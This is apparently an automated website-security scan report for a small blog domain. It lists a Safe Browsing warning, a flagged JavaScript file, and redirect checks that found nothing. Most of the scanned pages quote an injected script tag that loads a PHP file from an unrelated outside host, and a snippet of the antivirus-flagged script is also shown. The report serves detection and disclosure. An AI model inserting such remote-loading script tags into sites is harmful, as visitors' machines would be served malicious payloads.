Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pbelow005.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.pbelow005.com/ | 200 OK Content-Length: 48460 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://conviasaargentina.com.ar/tvxyfcbq.php?id=24153615"></script> | ||
http://www.pbelow005.com/2008/09/first_things_first.html | 200 OK Content-Length: 11942 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://conviasaargentina.com.ar/tvxyfcbq.php?id=24155371"></script> | ||
http://www.pbelow005.com/mt-site.js | 200 OK Content-Length: 10691 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function setCookie (name, value, expires, path, domain, secure) { var curCookie = name "=" escape(value) (expires ? "; expires=" expires : "") (path ? "; path=" path : "") (domain ? "; domain=" domain : "") (secure ? "secure" : ""); document.cookie = curCookie; } function getCookie (name) { var prefix = name '='; var c = document.cookie; var nullstring = ''; var cookieStartIndex = c.indexOf(prefix); i Antivirus reports:
| ||
http://www.pbelow005.com/2008/09/interesting_times.html | 200 OK Content-Length: 12896 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://conviasaargentina.com.ar/tvxyfcbq.php?id=24155373"></script> | ||
http://www.pbelow005.com/2008/09/politics_veggies.html | 200 OK Content-Length: 12740 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://conviasaargentina.com.ar/tvxyfcbq.php?id=24155374"></script> | ||
http://www.pbelow005.com/2008/08/awesome_tchocolate.html | 200 OK Content-Length: 11300 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://conviasaargentina.com.ar/tvxyfcbq.php?id=24155090"></script> | ||
http://www.pbelow005.com/2008/08/when_100_10000_100_million.html | 200 OK Content-Length: 12979 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://conviasaargentina.com.ar/tvxyfcbq.php?id=24155093"></script> | ||
http://www.pbelow005.com/2008/06/i_just_recently_got_back.html | 200 OK Content-Length: 11677 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://conviasaargentina.com.ar/tvxyfcbq.php?id=24155015"></script> | ||
http://www.pbelow005.com/2008/06/our_new_home.html | 200 OK Content-Length: 14541 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://conviasaargentina.com.ar/tvxyfcbq.php?id=24155017"></script> | ||
http://www.pbelow005.com/2008/05/day_whatever.html | 200 OK Content-Length: 13395 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://conviasaargentina.com.ar/tvxyfcbq.php?id=24154994"></script> | ||
http://www.pbelow005.com/2008/05/day_uhm_13.html | 200 OK Content-Length: 11594 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://conviasaargentina.com.ar/tvxyfcbq.php?id=24154993"></script> | ||
http://www.pbelow005.com/2008/05/day_6.html | 200 OK Content-Length: 11630 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://conviasaargentina.com.ar/tvxyfcbq.php?id=24154992"></script> | ||
http://www.pbelow005.com/2008/05/day_3_1.html | 200 OK Content-Length: 11093 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://conviasaargentina.com.ar/tvxyfcbq.php?id=24154991"></script> | ||
http://www.pbelow005.com/2008/05/day_1.html | 200 OK Content-Length: 11101 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://conviasaargentina.com.ar/tvxyfcbq.php?id=24154989"></script> | ||
http://www.pbelow005.com/2008/04/getting_ready.html | 200 OK Content-Length: 10915 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://conviasaargentina.com.ar/tvxyfcbq.php?id=24154806"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pbelow005.com
Result:
GET / HTTP/1.1
Host: pbelow005.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: pbelow005.com
Referer: http://www.google.com/search?q=pbelow005.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pbelow005.com
Referer: http://www.google.com/search?q=pbelow005.com
Result:
The result is similar to the first query. There are no suspicious redirects found.